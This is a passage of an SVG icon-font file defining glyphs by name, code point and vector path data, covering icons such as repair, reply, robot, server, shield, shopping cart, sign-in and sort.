<glyph glyph-name="repair" horiz-adv-x="1000" unicode="&#xefd2;" d="M493 289c17-16 34-32 48-45 18 17 36 33 54 50 2 2 2 6 2 9 2 13 3 26 6 38 12 38 51 64 91 61 3 0 7 2 9 5 63 65 127 130 190 195 15 16 30 31 45 47-1 1-2 2-2 2-32 33-63 66-95 99-12 12-23 25-35 37h-3c-1 0-2-1-3-2-76-79-153-159-230-238-3-3-5-9-5-13 3-48-34-93-82-97-17-1-29-6-38-19-2-3-4-4-6-7-10-10-20-20-31-31 16-17 32-33 48-50-78-81-157-162-235-243l-9 8c-26-20-51-41-67-71-16-31-36-61-55-91 7-7 14-14 20-21 2 1 3 2 4 3 31 20 62 40 92 60 9 5 19 10 25 17 13 15 25 30 37 46l-9 9c79 82 157 162 234 242z m-191 99c3 1 7-1 9-3 11-10 20-21 31-31 18-18 38-35 55-51 8 7 20 17 34 29-19 16-36 31-53 46 3 3 3 4 4 5 24 24 47 48 70 72 2 2 6 3 9 3 9 1 18 0 27 0-18 22-36 41-54 60-2 2-4 6-3 9 12 56 4 108-27 155-43 63-103 91-180 83-8-1-15-3-25-5 15-15 28-28 40-42 21-21 42-42 62-64 2-2 3-7 3-10-8-31-16-63-25-94 0-3-4-7-7-8-30-9-61-17-91-25-5-2-7-1-10 3-27 28-55 56-82 84-6 7-13 13-20 20-2-10-4-19-6-28v-46c0-1 1-3 1-4 14-111 122-192 238-158z m452-201c-32 33-65 67-97 100-12 13-25 24-38 36 0-2-2-5-1-7 5-21-6-35-21-48-19-17-38-36-56-52-14 13-31 28-46 42-10-9-21-19-32-29 23-24 44-46 66-69 58-60 117-120 175-181 16-16 30-32 47-46 35-30 86-25 117 8 33 34 34 91 3 124-39 41-78 81-117 122z m81-214c-1-2-3-3-5-4-11-3-23-6-34-9-3 0-7 1-9 2-9 10-19 20-28 30-2 2-3 6-2 9 2 11 5 23 9 34 0 3 3 6 6 7 11 3 23 6 34 9 2 1 6-1 8-2 10-10 19-20 29-29 1-2 2-4 3-6-4-14-7-28-11-41z" />
<glyph glyph-name="reply-all" horiz-adv-x="1000" unicode="&#xefd3;" d="M314 530v81c0 8-4 10-10 4l-237-237c-6-6-6-15 0-20l237-237c6-6 10-4 10 4v81c0 8-4 19-10 25l-127 127c-6 5-6 15 0 20l127 127c6 6 10 17 10 25z m221-37v118c0 8-5 10-10 4l-237-237c-6-5-6-15 0-20l237-237c5-6 10-4 10 4v122c0 8 7 14 15 14 170-3 293-58 381-176 5-6 8-5 6 3-39 175-147 348-388 388-8 2-14 9-14 17z" />
<glyph glyph-name="reply" horiz-adv-x="1000" unicode="&#xefd4;" d="M399 541v159c0 10-6 13-13 5l-318-318c-7-7-7-19 0-26l318-318c7-7 13-5 13 5v164c0 11 9 19 19 19 229-4 392-78 511-236 7-8 10-6 8 4-52 235-196 466-519 520-10 2-19 11-19 22z" />
<glyph glyph-name="resize" horiz-adv-x="1000" unicode="&#xefd5;" d="M597 777c32-32 62-63 93-94 6-5 6-15 0-21-67-67-133-133-200-200-14-14-14-23 0-37 28-29 56-57 85-85 15-15 23-15 38 0 65 65 130 130 195 195 3 2 5 5 8 7 4 4 13 3 19-3 30-30 61-61 92-92 6-5 11-3 11 5v320c0 8-7 15-15 15h-322c-8 0-10-5-4-10z m-176-448c-10 10-16 10-27 0l-146-147c-1-1-2-2-3-3-2-2-8 1-14 6l-62 61c-6 6-11 4-11-4v-224c0-8 7-15 15-15h223c8 0 10 5 4 11-20 21-40 41-59 62-6 6-6 15 0 21 48 48 96 96 143 144 9 9 9 16 0 25-21 21-42 42-63 63z m472-387h-407c-126 0-251 0-378 0-8 0-14 6-14 14v787c0 8 6 15 14 15h391c8 0 15 7 15 15s-7 14-15 14h-422c-8 0-14-7-14-15v-845c0-8 6-14 14-14h846c8 0 15 6 15 14v422c0 8-7 14-15 14h-1c-8 0-14-6-14-14v-392c0-9-7-15-15-15z" />
<glyph glyph-name="responsive" horiz-adv-x="1000" unicode="&#xefd6;" d="M926 218h-16v179c0 8-6 15-14 15h-37v226c0 11-6 19-17 19h-757c-11 0-22-8-22-19v-444c0-11 11-24 22-24h295l-6-66s-2-11-9-19-22-22-22-22-12-12 6-15c11-2 59-4 97-4h36c39 0 86 2 96 4 19 4 7 15 7 15s-14 14-22 23c-7 9-9 18-9 18l-6 66h86v-111c0-9 6-15 14-15h278c6 0 12 5 12 11v151c0 7-6 12-12 12z m-23-10v-3c0-1-1-2-2-2h-10c-1 0-2 1-2 2v3c0 1 1 2 2 2h10c1 0 2-1 2-2z m-810-2v416h733v-210h-178c-8 0-14-6-14-15v-191h-541z m567-36v211h222v-163h-16c-7 0-12-5-12-12v-131h-194v95z m112-118c-5 0-9 3-9 8 0 5 4 8 9 8 4 0 8-3 8-8 0-4-4-8-8-8z m117 7c0 4 3 8 8 8 4 0 7-4 7-8 0-4-3-7-7-7-5 0-8 3-8 7z m42 13h-70v125h70v-125z" />
<glyph glyph-name="retweet" horiz-adv-x="1000" unicode="&#xefd7;" d="M277 221v205c0 8 6 13 14 13h63c7 0 9 5 4 10l-138 157c-4 6-12 6-17 0l-138-157c-5-5-3-10 5-10h63c7 0 13-5 13-13v-254c0-49 40-88 89-88h385c7 0 9 4 4 9l-96 105c-4 6-14 10-22 10h-215c-8 0-14 6-14 13z m577 52v254c0 49-40 89-89 89h-385c-7 0-9-4-4-10l96-104c5-6 14-10 22-10h216c7 0 13-6 13-13v-206c0-7-6-13-13-13h-64c-7 0-9-4-4-10l138-156c5-6 12-6 17 0l138 156c5 6 3 10-4 10h-64c-7 0-13 6-13 13z" />
<glyph glyph-name="road" horiz-adv-x="1000" unicode="&#xefd8;" d="M530 788v-47h-60v47h-165v-876h165v27h60v-27h166v876h-166z m0-734h-60v114h60v-114z m0 229h-60v114h60v-114z m0 229h-60v114h60v-114z m-336 276h69v-876h-69v876z m543 0h70v-876h-70v876z" />
<glyph glyph-name="robot" horiz-adv-x="1000" unicode="&#xefd9;" d="M806 458h-23v32c0 52-43 93-95 93h-154v78c20 11 34 33 34 59 0 37-30 68-68 68s-68-31-68-68c0-26 14-47 34-59v-77h-154c-52 0-94-42-94-94v-32h-24c-29 0-53-24-53-54v-114c0-29 24-53 53-53h24v-33c0-52 42-93 94-93h44v-50c0-29 24-53 53-53h182c29 0 53 24 53 53v50h44c52 0 95 41 95 93v33h23c29 0 53 24 53 53v114c0 29-24 54-53 54z m-512-36c0 34 28 62 62 62 34 0 62-28 62-62s-28-62-62-62c-34 0-62 27-62 62z m291-227h-170c-28 0-50 23-50 51 0 28 22 51 50 51h170c28 0 51-23 51-51s-23-51-51-51z m59 165c-34 0-62 27-62 62 0 34 28 62 62 62s62-28 62-62c0-35-27-62-62-62z m-30-379h-226c-18 0-32-15-32-33v-3c0-18 14-33 32-33h225c18 0 33 15 33 33v3c0 18-15 33-32 33z" />
<glyph glyph-name="royal" horiz-adv-x="1000" unicode="&#xefda;" d="M938 478c0-41-33-73-73-73-5 0-10 0-15 1l-62-293h-576l-62 293c-4-1-10-1-14-1-41 0-73 32-73 73 0 40 32 73 73 73s72-33 72-73c0-18-6-34-17-47l163-136 119 297c-27 11-46 37-46 68 0 40 33 73 73 73s73-33 73-73c0-31-19-57-46-68l119-297 163 136c-11 13-17 29-17 47 0 40 33 73 73 73 40 0 73-33 73-73z m-730-511h584v110h-584v-110z" />
<glyph glyph-name="rss-feed" horiz-adv-x="1000" unicode="&#xefdb;" d="M192 172c-71 0-129-58-129-130 0-71 58-129 129-129 72 0 130 58 130 129 0 72-58 130-130 130z m-116 330c-7 0-13-7-13-14v-165c0-7 6-13 13-13 211 0 384-172 384-384 0-7 6-13 13-13h165c8 0 14 6 14 13l-1 4c-2 316-259 572-575 572z m861-572c-2 473-388 857-861 857-7 0-13-6-13-13v-170c0-7 6-13 13-13 366 0 664-298 664-665 0-7 6-13 14-13h170c7 0 14 6 14 13l-1 4z" />
<glyph glyph-name="safety" horiz-adv-x="1000" unicode="&#xefdc;" d="M811 682c-256 0-299 96-299 98-2 4-7 8-12 8h0c-5 0-10-4-12-8 0-1-44-98-299-98-8 0-13-6-13-13v-435c0-179 306-315 319-321 1-1 3-1 5-1 2 0 4 0 5 1 13 6 319 142 319 321v435c0 7-5 13-13 13z m-92-187c-115-106-205-251-232-321-1-2-3-4-5-4 0-1-1-1-1-1-2 0-4 1-5 2l-169 172c-1 2 50 47 52 45l93-73c36 43 125 139 249 214 2 0 20-26 20-26 1-3 0-6-2-8z" />
<glyph glyph-name="sale-discount" horiz-adv-x="1000" unicode="&#xefdd;" d="M926 373l-107 81 39 128c3 9 1 18-4 25-5 7-14 12-22 12l-135 2-44 127c-2 9-9 15-18 18-8 3-18 1-25-4l-110-77-110 77c-7 5-17 7-25 4-9-3-15-9-18-18l-44-127-134-2c-9 0-18-5-23-12-5-7-7-16-4-25l39-128-107-81c-7-6-11-14-11-23s4-18 11-23l107-81-39-128c-3-9-1-18 4-25 5-8 14-12 23-12l134-3 44-127c3-8 9-15 18-17 8-3 18-2 25 3l110 77 110-77c5-3 11-5 16-5 3 0 6 1 9 2 9 2 15 9 18 17l44 127 134 3c9 0 18 4 23 12 5 7 7 16 4 25l-39 128 107 81c7 5 12 14 12 23s-5 17-12 23z m-601-43c-11 6-21 13-28 23-7 9-13 19-16 31-4 12-6 24-6 37s2 25 6 37c3 12 9 23 16 32 7 10 17 17 28 23 12 5 25 8 41 8 15 0 28-3 40-8s21-13 28-23c8-9 13-19 17-32 3-12 5-24 5-37s-2-25-5-37c-4-12-9-22-17-31-7-10-17-17-28-23s-25-8-40-8c-16 0-29 3-41 8z m94-145c-11-2-21-3-31-3-11 0-22 1-34 3l227 331c10 2 21 3 33 3 9 0 20-1 32-3l-227-331z m300 56c-3-12-9-23-16-32-8-9-17-16-29-22-11-6-24-8-40-8-15 0-29 2-40 8-12 6-21 13-28 22-8 9-13 20-17 32-3 12-5 24-5 37s2 25 5 37c4 12 9 23 17 32 7 9 16 17 28 22 11 6 25 9 40 9 16 0 29-3 40-9 12-5 21-13 29-22 7-9 13-20 16-32 4-12 6-24 6-37 0-13-2-25-6-37z m-328 140c5 10 8 24 8 40 0 17-3 31-8 40s-14 15-25 15c-12 0-20-5-25-15-5-9-8-23-8-40 0-16 3-29 8-40 5-10 13-15 25-15s19 5 25 15z m243-48c-11 0-19-5-25-15-5-10-8-23-8-40 0-17 3-30 8-40s14-15 25-15c12 0 20 5 25 15 6 10 8 23 8 40 0 17-2 30-8 40-5 10-13 15-25 15z" />
<glyph glyph-name="satellite" horiz-adv-x="1000" unicode="&#xefde;" d="M834 99c-67 66-133 133-199 199-5 5-10 8-16 8-5 0-10 1-15 1 35 46 25 106-8 139-32 32-92 44-138 8 0 1-1 2-1 3-1 6-1 12-2 17 0 3-2 5-3 6-68 68-135 136-203 204-1 1-2 1-4 3-1-1-1-3-2-4-59-59-118-117-177-176-1-1-2-2-3-3v-2c1 0 2-1 3-2 67-68 135-135 202-202 2-3 5-4 8-4 6-1 13-2 20-2-19-25-26-52-22-82 4-23 14-42 30-57 19-19 41-29 67-30 26-1 50 7 71 23 0-7 1-13 2-20 0-3 1-6 4-8 67-68 134-135 202-202 1-1 1-2 2-4h2c1 2 2 3 3 4 59 59 118 118 177 177 1 1 2 1 3 2l0 2c-1 0-2 1-3 2z m-430 302c-18-19-37-38-55-56-1-1-3-2-5-1-14 1-29 3-44 5-2 0-4 2-5 3-39 38-77 77-115 115-11 11-22 22-34 33-1 1-2 2-3 2l104 104c0-1 1-2 2-3l148-149c2-1 3-4 3-6 2-15 4-29 6-44 0-1-1-2-2-3z m249-407c-1 0-1 1-2 2-50 50-100 99-149 149-2 2-3 4-3 6-2 14-4 28-5 42-1 3 0 5 2 6 18 18 36 36 54 54 2 2 3 3 6 3l43-6c1 0 3-1 4-2 50-50 100-100 150-150 1 0 2-1 2-2-34-34-68-68-102-102z m284 406c-2 28-6 56-14 83-20 73-57 136-112 189-70 68-155 105-252 114-5 1-10 1-14 2h-20v-57c98-2 182-36 251-105 69-69 103-154 105-251h57v20c-1 1-1 3-1 5z m-185-25h57c1 61-22 150-98 215-54 46-116 68-186 69v-57c63-1 117-23 161-67 44-44 65-98 66-160z" />
<glyph glyph-name="send-mail" horiz-adv-x="1000" unicode="&#xefdf;" d="M915 547h-489c-16 0-31-13-34-28l-70-338c-3-16 7-28 23-28h489c15 0 30 12 33 28l70 338c3 15-7 28-22 28z m-59-113l-217-105c-9-4-20-4-27 0l-174 105c-13 7-15 25-4 39 7 10 18 16 29 16 5 0 9-2 13-4l162-97 201 97c5 2 10 4 15 4 11 0 19-6 22-16 5-14-4-32-20-39z m-717 39h211c11 0 20 9 20 20s-9 20-20 20h-211c-11 0-20-9-20-20 0-11 9-20 20-20z m154-143h-210c-11 0-20-9-20-20s9-21 20-21h210c12 0 21 9 21 21s-9 20-21 20z m49 73c0 11-9 20-20 20h-126c-11 0-20-9-20-20 0-11 9-21 20-21h126c11 0 20 9 20 21z" />
<glyph glyph-name="server" horiz-adv-x="1000" unicode="&#xefe0;" d="M173 338c5 0 10-1 15-1 104 0 208 0 312 0h313c5 0 11 1 16 1 16 3 28 15 28 31 0 48 0 97 0 145-1 16-12 28-29 30-5 1-10 1-14 1h-627c-5 0-10 0-14-1-17-2-29-14-29-31 0-48 0-96 0-143 0-17 12-29 29-32z m598 133c16 0 29-13 30-29 0-16-13-30-30-30-16 0-28 13-29 29 0 16 13 29 29 30z m-554 1h407v-61h-407v61z m-44 109c5-1 11-1 16-1 208 0 415 0 623 0 5 0 10 0 15 1 18 2 29 14 30 31 0 48 0 96 0 143 0 18-12 30-29 32-5 0-10 1-15 1h-626c-5 0-10-1-15-1-16-2-28-15-28-31 0-48 0-96 0-145 0-16 12-28 29-30z m599 132c16 0 29-14 28-30 0-16-13-29-30-28-16 1-28 14-28 30 1 16 14 29 30 28z m-555 1h407v-61h-407v61z m627-737h-304v8c0 4-3 7-6 7h-8v108h116c60 0 120 0 179 0 22 0 35 13 36 32 0 48 0 96 0 143-1 17-11 28-27 32-5 1-11 1-16 1-209 0-418 0-627 0-5 0-10 0-14-1-18-3-29-15-29-33-1-47 0-94 0-141 0-16 10-29 25-32 5-1 11-1 17-1h288v-108h-7c-4 0-7-3-7-7v-8h-303c-7 0-13-5-13-13v-24c0-7 6-13 13-13h304v-8c0-4 2-6 6-6h67c3 0 6 2 6 6v8h304c7 0 13 6 13 13v24c0 7-6 13-13 13z m-73 256c16 1 30-13 30-29-1-17-13-29-30-29-16 0-29 12-29 28 0 17 13 30 29 30z m-554 2h408v-62h-408v62z" />
<glyph glyph-name="settings-alt" horiz-adv-x="1000" unicode="&#xefe1;" d="M628 238c-22 3-45 7-68 11-5 1-8 3-9 8-4 16-10 30-19 44-2 5-2 8 1 12l42 60c4 4 3 7-1 10-13 14-27 27-40 41-4 4-7 4-12 1l-58-42c-4-3-7-4-12-1-14 8-29 14-45 18-5 2-7 4-7 9-4 23-8 46-12 70-1 6-3 9-11 9-18-1-37-1-55 0-7 0-9-2-10-9-3-22-7-45-10-67-1-6-3-10-9-12-16-3-31-10-45-18-4-2-7-2-10 1-20 14-40 28-60 43-4 3-6 2-10-1-14-14-27-28-41-42-4-3-4-6-1-10 14-20 27-40 41-60 3-3 4-6 1-10-8-15-15-31-19-47-1-3-2-5-6-6-27-4-54-9-80-13v-72c25-5 51-10 77-14 5-1 8-3 9-9 4-15 11-30 19-44 3-5 2-8-1-12-14-19-28-39-42-59-3-4-3-6 1-9 14-14 28-28 42-43 3-3 5-3 9 0 20 14 40 27 59 42 5 3 8 3 13 0 13-8 28-14 44-18 5-1 7-3 8-9 4-26 9-51 13-77h72c5 26 10 51 14 77 1 6 3 8 8 9 15 4 29 10 43 18 5 3 9 3 14 0l58-41c4-4 7-4 12 0 13 14 26 28 40 41 4 4 4 7 0 12-14 19-27 38-41 58-4 4-4 7-2 12 9 13 15 28 19 44 1 5 4 7 9 8 24 4 48 8 71 12 6 1 8 4 8 9-1 18-1 37 0 55 0 8-3 10-11 11z m-278-139c-55 1-100 46-100 101 0 55 46 101 101 100 56 0 100-45 100-100 0-56-46-101-101-101z m538 447c-4 3-6 5-5 10 2 11 1 23 0 34 0 5 1 8 5 11l45 28c5 2 5 5 3 9-5 13-11 26-16 39-1 5-4 6-9 5-17-4-34-8-51-12-5-1-8-1-11 3-7 10-15 18-24 25-4 3-5 5-4 10 4 17 8 34 12 52 1 4 1 7-5 9-13 5-26 11-38 17-5 1-7 1-9-3-9-15-19-30-28-45-3-5-6-6-11-5-11 1-23 2-34 0-5-1-7 1-10 5-9 14-18 29-27 44-3 5-6 6-11 3-12-5-23-10-35-14-7-2-9-5-7-13 4-17 8-34 12-54 1-2-3-3-5-5-9-7-17-15-24-24-3-5-7-5-12-4-17 4-34 8-50 12-6 2-7 0-9-4-5-13-10-26-16-38-3-6-1-8 4-11 14-9 29-19 43-28 4-3 5-5 5-10-1-11-2-23 0-34 0-5-1-9-6-11-14-9-28-18-43-27-5-3-6-5-4-11 6-12 11-24 15-37 3-6 6-7 11-5 16 4 33 7 49 11 5 1 9 0 12-4 7-10 16-18 25-25 3-2 4-5 3-9-4-17-8-34-12-51-2-6-1-9 5-11 13-5 25-10 37-15 6-3 8-1 11 3 9 15 19 29 28 44 2 4 5 6 10 5 12-2 23-2 34 0 5 1 8 0 10-4l28-45c3-5 6-6 11-4 12 6 25 11 38 16 4 2 6 3 5 9-5 17-8 34-13 51-1 5 0 8 4 11 9 7 18 15 25 25 2 4 5 4 10 3 17-4 35-7 52-12 5-1 7 1 9 5 5 13 10 25 16 37 2 6 1 8-4 11-15 10-29 19-44 28z m-164-49c-42 0-77 36-76 77 0 43 36 77 78 76 42 0 76-35 75-77-1-43-34-76-77-76z" />
<glyph glyph-name="settings" horiz-adv-x="1000" unicode="&#xefe2;" d="M890 416h-489c-23 45-70 75-125 75-54 0-101-30-125-75h-41c-10 0-18-8-18-18v-96c0-10 8-18 18-18h41c24-45 71-75 125-75 55 0 102 30 125 75h489c10 0 18 8 18 18v96c0 10-8 18-18 18z m-585-132c-8-4-18-6-29-6s-20 2-29 6c-25 11-43 37-43 66 0 29 18 55 43 66 9 4 19 6 30 6 10 0 20-2 29-6 25-11 43-36 43-66-1-29-18-55-44-66z m585 428h-142c-24 45-71 76-125 76s-101-31-125-76h-388c-10 0-18-8-18-18v-95c0-10 8-19 18-19h388c23-44 71-75 125-75 54 0 101 31 125 75h142c10 0 18 9 18 19v95c0 10-8 18-18 18z m-238-132c-9-3-19-6-29-6s-20 3-29 6c-26 12-43 37-43 66 0 30 17 55 43 66 8 4 18 6 29 6s20-2 29-6c25-11 43-36 43-66 0-29-18-54-43-66z m238-460h-233c-24 44-71 75-125 75-55 0-102-30-125-75h-297c-10 0-18-8-18-19v-95c0-10 8-18 18-18h297c23-45 71-75 125-75 54 0 101 30 125 75h233c10 0 18 8 18 18v95c0 11-8 19-18 19z m-329-132c-9-4-19-6-29-6s-21 2-29 6c-26 11-43 36-43 66 0 29 17 54 43 66 8 4 18 6 29 6 10 0 20-2 29-6 25-11 43-37 43-66 0-30-18-55-43-66z" />
<glyph glyph-name="share-alt" horiz-adv-x="1000" unicode="&#xefe3;" d="M256 207c-3-20-4-40-5-60-1-5 1-6 3-2 8 14 15 28 23 40 33 49 82 78 136 97 59 22 121 30 183 33 24 1 47 1 71 0 5 0 9-4 9-8v-129c0-5 3-6 6-3 84 83 167 165 249 246 4 3 4 9 0 12l-250 251c-4 3-6 2-6-3v-127c0-5-4-9-9-9-45-1-89-7-132-19-84-24-155-66-208-137-40-54-61-116-70-182z m620-83v-37c0-5-4-9-9-9h-732c-5 0-9 4-9 9v477c0 5 4 9 9 9h9c75 0 150 0 224 0 6 0 13 0 17 3 28 18 55 36 82 54 4 3 4 5-1 5h-395c-5 0-8-4-8-8v-604c0-5 3-9 8-9h858c5 0 9 4 9 9v248c0 5-3 6-7 3-17-17-33-33-48-49-4-5-7-13-7-19-1-27 0-55 0-82z" />
<glyph glyph-name="share-boxed" horiz-adv-x="1000" unicode="&#xefe4;" d="M865 788h-730c-40 0-72-33-72-73v-730c0-40 32-73 72-73h730c40 0 73 33 73 73v730c0 40-33 73-73 73z m-196-731c-63 0-114 51-114 113 0 13 3 25 6 36l-148 82c-21-22-49-35-82-35-62 0-113 51-113 113 0 63 51 114 113 114 33 0 62-14 83-36l113 49c-4 11-6 24-6 37 0 62 51 113 113 113 63 0 114-51 114-113 0-63-51-114-114-114-38 0-72 19-93 49l-109-47c8-16 13-34 13-52 0-19-5-37-14-53l144-79c21 30 55 50 94 50 63 0 113-51 113-114 0-62-50-113-113-113z" />
<glyph glyph-name="share" horiz-adv-x="1000" unicode="&#xefe5;" d="M752 251c-58 0-110-29-140-74l-214 119c12 23 19 50 19 78 0 28-7 54-19 77l163 71c31-44 82-73 139-73 94 0 170 76 170 169s-76 170-170 170-169-76-169-170c0-19 3-37 9-55l-169-73c-31 33-75 54-123 54-94 0-170-76-170-170 0-93 76-169 170-169 48 0 91 20 122 53l221-123c-5-16-8-34-8-53 0-94 76-169 169-169s169 76 169 169-75 169-169 169z" />
<glyph glyph-name="shield" horiz-adv-x="1000" unicode="&#xefe6;" d="M851 638c-121 32-239 73-345 148-3 2-7 2-10 0-107-75-225-116-347-148-3-1-6-3-6-5 0-1 0-3 0-4 2-80 4-160 8-240 4-98 34-185 87-262 68-98 156-166 257-214 4-1 10-1 14 1 81 38 154 91 216 163 82 93 124 206 128 337 1 42 3 84 4 126 1 30 1 60 0 90 0 3-2 7-6 8z" />
<glyph glyph-name="shopping-cart" horiz-adv-x="1000" unicode="&#xefe7;" d="M796 229c46 117 93 233 139 350 1 2 2 4 2 7 2 4-6 7-17 7h-670c-11 0-22 8-24 19-6 31-13 62-19 93-2 10-13 19-24 19h-101c-11 0-19-9-19-20v-10c0-11 8-19 19-19h61c10 0 21-9 23-20 37-181 74-362 111-543 2-11-4-24-12-32-10-11-16-26-16-42 0-34 28-62 63-62 34 0 63 28 63 62 0 8-1 15-4 22-4 10-1 17 10 17h311c11 0 14-7 10-17-3-7-4-14-4-21-1-33 28-63 62-64 35 0 63 28 64 62 0 20-9 37-23 49-9 7-17 17-17 25s-9 14-20 14h-418c-11 0-22 9-24 19-4 18-7 34-11 52-2 10 1 19 7 19h10c148 0 297 0 446 0 12 0 17 3 22 14z" />
<glyph glyph-name="sign-in" horiz-adv-x="1000" unicode="&#xefe8;" d="M770 370l-322 330c-10 11-27 11-38 0l-63-65c-11-11-11-29 0-40l151-156h-409c-14 0-26-12-26-28v-111c0-15 12-27 26-27h421l-163-168c-11-11-11-28 0-39l63-66c11-11 28-11 38 0l322 331c10 10 10 28 0 39z m130 252h-166v-76h128v-392h-128v-75h166c21 0 38 16 38 37v468c0 21-17 38-38 38z" />
<glyph glyph-name="sign-out" horiz-adv-x="1000" unicode="&#xefe9;" d="M930 370l-321 330c-11 11-28 11-38 0l-64-65c-11-11-11-29 0-40l152-156h-409c-15 0-27-12-27-28v-111c0-15 12-27 27-27h420l-163-168c-11-11-11-28 0-39l64-66c10-11 27-11 38 0l321 331c10 10 10 28 0 39z m-830 252h166v-76h-128v-392h128v-75h-166c-21 0-37 16-37 37v468c0 21 16 38 37 38z" />
<glyph glyph-name="signal" horiz-adv-x="1000" unicode="&#xefea;" d="M747 727v-754c0-33 27-61 60-61h25c34 0 61 27 61 61v754c0 33-27 61-61 61h-25c-33 0-60-27-60-61z m-152-814h25c33 0 60 27 60 60v607c0 33-27 60-60 60h-25c-34 0-61-27-61-60v-607c0-33 27-60 61-60z m-214-1h26c33 0 61 27 61 61v459c0 33-27 60-61 60h-26c-33 0-61-27-61-60v-459c0-34 28-61 61-61z m-212 1h24c33 0 61 27 61 60v312c0 33-27 60-61 60h-24c-34 0-61-27-61-60v-312c0-33 27-60 61-60z" />
<glyph glyph-name="site-map" horiz-adv-x="1000" unicode="&#xefeb;" d="M836 258v35c0 8-7 15-15 15h-298c-8 0-15 7-15 16v24c0 9 7 16 15 16h118c8 0 15 7 15 15v282c0 8-7 15-15 15h-282c-8 0-15-6-15-15v-282c0-8 7-15 15-15h118c8 0 15-7 15-16v-25c0-8-7-15-15-15h-297c-9 0-16-7-16-16v-34c0-9-7-16-15-16h-71c-8 0-15-7-15-15v-188c0-8 6-15 15-15h188c8 0 15 6 15 15v188c0 8-7 15-15 15h-71c-8 0-15 7-15 16v19c0 9 6 16 15 16h282c8 0 15-7 15-16v-19c0-9-7-16-15-16h-71c-8 0-15-6-15-15v-188c0-8 6-15 15-15h188c9 0 16 6 16 15v188c0 8-7 15-16 15h-71c-8 0-15 7-15 16v19c0 9 7 16 15 16h282c8 0 15-7 15-16v-19c0-9-6-16-15-16h-71c-8 0-15-6-15-15v-188c0-8 7-15 15-15h188c9 0 16 6 16 15v188c0 8-7 15-16 15h-71c-8 0-15 7-15 16z" />
<glyph glyph-name="smart-phone" horiz-adv-x="1000" unicode="&#xefec;" d="M705 788h-410c-19 0-34-16-34-35v-806c0-19 15-35 34-35h410c19 0 35 16 35 35v806c0 19-16 35-35 35z m-238-802c0 19 15 34 33 34 19 0 34-15 34-34 0-18-15-33-34-33s-33 15-33 33z m-180 58v637h427v-637h-427z" />
<glyph glyph-name="soccer" horiz-adv-x="1000" unicode="&#xefed;" d="M496 787c5 0 12 0 17 0 233-6 424-196 425-434 1-247-195-442-443-440-239 2-433 197-432 438 2 245 197 434 433 436z m-224-400c-16 0-30 0-44 0-6 0-10-2-14-7-25-34-42-72-54-113-2-6-2-13 0-19 14-59 45-107 87-150 4-4 10-7 15-9 43-14 88-11 132-5 2 0 5 2 6 5 23 42 47 85 70 128 3 6 2 10-1 15-33 44-62 89-80 142 0 2-4 5-7 5-37 3-75 5-110 8z m-83 122c4-38 15-74 29-109 1-2 6-4 9-4 47-3 94-4 140-7 16-2 28 0 34 16 2 4 5 7 8 10 25 34 54 64 85 92 3 2 5 7 5 10-4 45-14 89-30 132-2 5-5 8-11 10-41 13-82 14-124 9-6-1-13-2-18-5-19-14-39-27-57-43-27-24-46-55-64-85-2-3-3-6-5-9-1-4-2-12-1-17z m356-521c44-2 87 9 129 29 11 4 19 11 26 20 23 32 44 66 54 105 2 7 1 12-4 18-28 34-59 65-93 93-5 4-9 6-16 4-49-17-100-26-152-34-3 0-8-3-9-6-20-45-44-88-70-130-4-5-3-9 0-14 18-25 38-46 61-64 15-11 30-22 51-21 7 1 14 0 23 0z m245 548c-3 39-16 73-31 106-1 2-4 4-5 6-41 38-89 63-144 73-19 4-37 5-55-5-26-15-53-29-74-51-4-5-5-9-3-15 16-41 26-84 30-128 0-6 3-9 8-11 52-14 99-35 144-64 5-4 9-3 14 0 34 19 67 39 102 58 7 4 13 8 15 14 2 4 0 12-1 17z m107-184c-1 13-1 26-3 39-1 10 0 23-6 31-23 32-51 60-85 81-6 3-10 2-15-1-36-21-72-42-109-62-5-3-8-7-8-14 0-51-4-103-14-154-1-3 1-8 4-10 36-29 68-61 97-97 4-5 7-6 13-4 37 10 66 32 92 58 2 1 3 4 4 6 14 36 26 71 30 110 0 4 0 12 0 17z m-812-66c19-109 71-198 157-266 4-3 7-2 6 3-1 19-2 37-3 56 0 5-2 10-5 13-43 45-75 96-90 156-1 4-3 7-6 9-17 11-35 22-53 33-4 2-7 1-6-4z m25 207l4 3c18 15 37 27 59 34 7 2 11 6 15 12 31 52 69 97 122 128 3 2 5 7 6 10 5 16 9 32 14 48 0 0 0 1 0 3 1 2-3 1-7-1-102-49-174-126-213-232-2-4-2-7 0-5z m327-557c104-16 201 5 292 62 4 2 4 6-1 7-9 2-17 4-25 7-7 3-13 2-19-1-32-14-63-28-98-30-26-1-52 0-78-1-5 0-10-1-14-4-17-14-36-26-58-35-4-2-4-4 1-5z m353 718c-71 65-152 102-246 113-5 1-6-1-2-4 12-9 23-18 35-26 3-2 6-3 10-4 65-6 122-32 170-76 2-3 6-4 9-5 7-1 14-2 22-3 4-1 5 2 2 5z m115-214c-2-12-7-24-3-37 2-9 2-19 3-29 4-50-7-97-26-142-7-17-1-33 0-49 1-5 3-5 4-1 37 83 46 169 26 258-1 5-3 4-4 0z" />
<glyph glyph-name="sort-alt" horiz-adv-x="1000" unicode="&#xefee;" d="M455 787h-102c-10 0-18-8-18-18v-652c0-10-8-19-19-19h-83c-10 0-18 0-19-1s6-6 15-12c76-56 152-113 230-170 8-6 15-2 15 8v846c0 10-9 18-19 18z m316-172c-76 56-152 112-230 170-8 6-15 2-15-8v-846c0-10 9-18 19-18h102c10 0 18 8 18 18v652c0 10 8 19 19 19h83c10 0 18 0 19 1 0 1-7 6-15 12z" />
<glyph glyph-name="sort" horiz-adv-x="1000" unicode="&#xefef;" d="M161 413h678c33 0 41 19 18 43l-315 314c-23 23-61 23-84 0l-315-314c-23-24-15-43 18-43z m678-126h-678c-33 0-41-19-18-43l315-314c23-23 61-23 84 0l315 314c23 24 15 43-18 43z" />
